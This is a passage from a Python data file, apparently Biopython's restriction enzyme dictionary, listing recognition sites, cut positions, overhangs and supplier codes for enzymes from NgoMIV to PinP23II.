'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 11,
'scd5': 24,
'site': 'GACNNNNNTGA',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NgoAVIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCCGGC'),
'compsite': '(?=(?P<NgoMIV>GCCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['NgoMIV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAAGRAG'),
'compsite': '(?=(?P<NhaXI>CAAG[AG]AG))|(?=(?P<NhaXI_as>CT[CT]CTTG))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAAGRAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NhaXI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCTAGC'),
'compsite': '(?=(?P<NheI>GCTAGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['NheI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCWGC'),
'compsite': '(?=(?P<NhoI>GC[AT]GC))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCWGC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NhoI'] = _temp()
def _temp():
return {
'charac': (25, 17, None, None, 'CATCAC'),
'compsite': '(?=(?P<NlaCI>CATCAC))|(?=(?P<NlaCI_as>GTGATG))',
'dna': None,
'freq': 4096.0,
'fst3': 17,
'fst5': 25,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATCAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NlaCI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CATG'),
'compsite': '(?=(?P<NlaIII>CATG))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['NlaIII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGNNCC'),
'compsite': '(?=(?P<NlaIV>GG..CC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNNCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['NlaIV'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CYCGRG'),
'compsite': '(?=(?P<Nli3877I>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Nli3877I'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'GCCGAC'),
'compsite': '(?=(?P<NmeA6CIII>GCCGAC))|(?=(?P<NmeA6CIII_as>GTCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NmeA6CIII'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'GCCGAG'),
'compsite': '(?=(?P<NmeAIII>GCCGAG))|(?=(?P<NmeAIII_as>CTCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['NmeAIII'] = _temp()
def _temp():
return {
'charac': (-12, -13, 13, 12, 'RCCGGY'),
'compsite': '(?=(?P<NmeDI>[AG]CCGG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -13,
'fst5': -12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 12,
'scd5': 13,
'site': 'RCCGGY',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NmeDI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GTSAC'),
'compsite': '(?=(?P<NmuCI>GT[CG]AC))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTSAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTSAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['NmuCI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCGGCCGC'),
'compsite': '(?=(?P<NotI>GCGGCCGC))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGGCCGC',
'size': 8,
'substrat': 'DNA',
'suppl': ('B', 'C', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['NotI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GATCGAC'),
'compsite': '(?=(?P<NpeUS61II>GATCGAC))|(?=(?P<NpeUS61II_as>GTCGATC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATCGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NpeUS61II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TCGCGA'),
'compsite': '(?=(?P<NruI>TCGCGA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGCGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'X'),
}
rest_dict['NruI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGCGCA'),
'compsite': '(?=(?P<NsbI>TGCGCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCGCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['NsbI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'ATGCAT'),
'compsite': '(?=(?P<NsiI>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'M', 'N', 'Q', 'R', 'S', 'X'),
}
rest_dict['NsiI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CMGCKG'),
'compsite': '(?=(?P<NspBII>C[AC]GC[GT]G))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CMGCKG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NspBII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RCATGY'),
'compsite': '(?=(?P<NspI>[AG]CATG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCATGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['NspI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<NspV>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('J',),
}
rest_dict['NspV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACGAG'),
'compsite': '(?=(?P<ObaBS10I>ACGAG))|(?=(?P<ObaBS10I_as>CTCGT))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGAG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['ObaBS10I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAACNAC'),
'compsite': '(?=(?P<OgrI>CAAC.AC))|(?=(?P<OgrI_as>GT.GTTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAACNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['OgrI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CACNNNNGTG'),
'compsite': '(?=(?P<OliI>CAC....GTG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNNGTG',
'size': 10,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['OliI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'YAGGAG'),
'compsite': '(?=(?P<OspHL35III>[CT]AGGAG))|(?=(?P<OspHL35III_as>CTCCT[AG]))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'YAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['OspHL35III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GTAC'),
'compsite': '(?=(?P<PabI>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PabI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCTTGA'),
'compsite': '(?=(?P<Pac19842II>CCTTGA))|(?=(?P<Pac19842II_as>TCAAGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTTGA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pac19842II'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'TTAATTAA'),
'compsite': '(?=(?P<PacI>TTAATTAA))',
'dna': None,
'freq': 65536.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTAATTAA',
'size': 8,
'substrat': 'DNA',
'suppl': ('B', 'N', 'O'),
}
rest_dict['PacI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTAATC'),
'compsite': '(?=(?P<PacIII>GTAATC))|(?=(?P<PacIII_as>GATTAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAATC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PacIII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCATGC'),
'compsite': '(?=(?P<PaeI>GCATGC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PaeI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTCGAG'),
'compsite': '(?=(?P<PaeR7I>CTCGAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PaeR7I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCATGA'),
'compsite': '(?=(?P<PagI>TCATGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCATGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PagI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCRTGAG'),
'compsite': '(?=(?P<Pal408I>CC[AG]TGAG))|(?=(?P<Pal408I_as>CTCA[CT]GG))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCRTGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pal408I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCGCGCC'),
'compsite': '(?=(?P<PalAI>GGCGCGCC))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCGCC',
'size': 8,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PalAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCCWGGG'),
'compsite': '(?=(?P<PasI>CCC[AT]GGG))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'CWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCWGGG',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PasI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGCGC'),
'compsite': '(?=(?P<PauI>GCGCGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PauI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTAAG'),
'compsite': '(?=(?P<Pba2294I>GTAAG))|(?=(?P<Pba2294I_as>CTTAC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAAG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pba2294I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GACGAG'),
'compsite': '(?=(?P<PcaII>GACGAG))|(?=(?P<PcaII_as>CTCGTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PcaII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGGCCT'),
'compsite': '(?=(?P<PceI>AGGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['PceI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACATGT'),
'compsite': '(?=(?P<PciI>ACATGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACATGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['PciI'] = _temp()
def _temp():
return {
'charac': (8, 4, None, None, 'GCTCTTC'),
'compsite': '(?=(?P<PciSI>GCTCTTC))|(?=(?P<PciSI_as>GAAGAGC))',
'dna': None,
'freq': 16384.0,
'fst3': 4,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCTTC',
'size': 7,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PciSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCAAAG'),
'compsite': '(?=(?P<Pcr308II>CCAAAG))|(?=(?P<Pcr308II_as>CTTTGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCAAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pcr308II'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'WCGNNNNNNNCGW'),
'compsite': '(?=(?P<PcsI>[AT]CG.......CG[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WCGNNNNNNNCGW',
'size': 13,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PcsI'] = _temp()
def _temp():
return {
'charac': (7, -1, None, None, 'GAATGC'),
'compsite': '(?=(?P<PctI>GAATGC))|(?=(?P<PctI_as>GCATTC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAATGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['PctI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGGNAG'),
'compsite': '(?=(?P<Pdi8503III>CCGG.AG))|(?=(?P<Pdi8503III_as>CT.CCGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGGNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pdi8503III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCCGGC'),
'compsite': '(?=(?P<PdiI>GCCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PdiI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAANNNNTTC'),
'compsite': '(?=(?P<PdmI>GAA....TTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANNNNTTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PdmI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACCAC'),
'compsite': '(?=(?P<Pdu1735I>CACCAC))|(?=(?P<Pdu1735I_as>GTGGTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACCAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pdu1735I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCAGT'),
'compsite': '(?=(?P<PenI>GCAGT))|(?=(?P<PenI_as>ACTGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGT',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PenI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GAWTC'),
'compsite': '(?=(?P<PfeI>GA[AT]TC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'AWT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAWTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PfeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TCGTAG'),
'compsite': '(?=(?P<Pfl1108I>TCGTAG))|(?=(?P<Pfl1108I_as>CTACGA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGTAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pfl1108I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGTACG'),
'compsite': '(?=(?P<Pfl23II>CGTACG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTACG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Pfl23II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCNNGC'),
'compsite': '(?=(?P<Pfl8569I>GC..GC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNNGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pfl8569I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GACNNNGTC'),
'compsite': '(?=(?P<PflFI>GAC...GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNGTC',
'size': 9,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PflFI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCANNNNNTGG'),
'compsite': '(?=(?P<PflMI>CCA.....TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNTGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PflMI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RGCCCAC'),
'compsite': '(?=(?P<PflPt14I>[AG]GCCCAC))|(?=(?P<PflPt14I_as>GTGGGC[CT]))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCCCAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PflPt14I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCNGGA'),
'compsite': '(?=(?P<PfoI>TCC.GGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCNGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCNGGA',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PfoI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TANAAG'),
'compsite': '(?=(?P<PfrJS12IV>TA.AAG))|(?=(?P<PfrJS12IV_as>CTT.TA))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TANAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PfrJS12IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGCGGAG'),
'compsite': '(?=(?P<PfrJS12V>GGCGGAG))|(?=(?P<PfrJS12V_as>CTCCGCC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PfrJS12V'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTTCNAC'),
'compsite': '(?=(?P<PfrJS15III>CTTC.AC))|(?=(?P<PfrJS15III_as>GT.GAAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTCNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PfrJS15III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGYGAB'),
'compsite': '(?=(?P<Pin17FIII>GG[CT]GA[CGT]))|(?=(?P<Pin17FIII_as>[ACG]TC[AG]CC))',
'dna': None,
'freq': 682.6666666666666,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYGAB',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pin17FIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<PinAI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['PinAI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTRKCAG'),
'compsite': '(?=(?P<PinP23II>CT[AG][GT]CAG))|(?=(?P<PinP23II_as>CTG[AC][CT]AG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRKCAG',
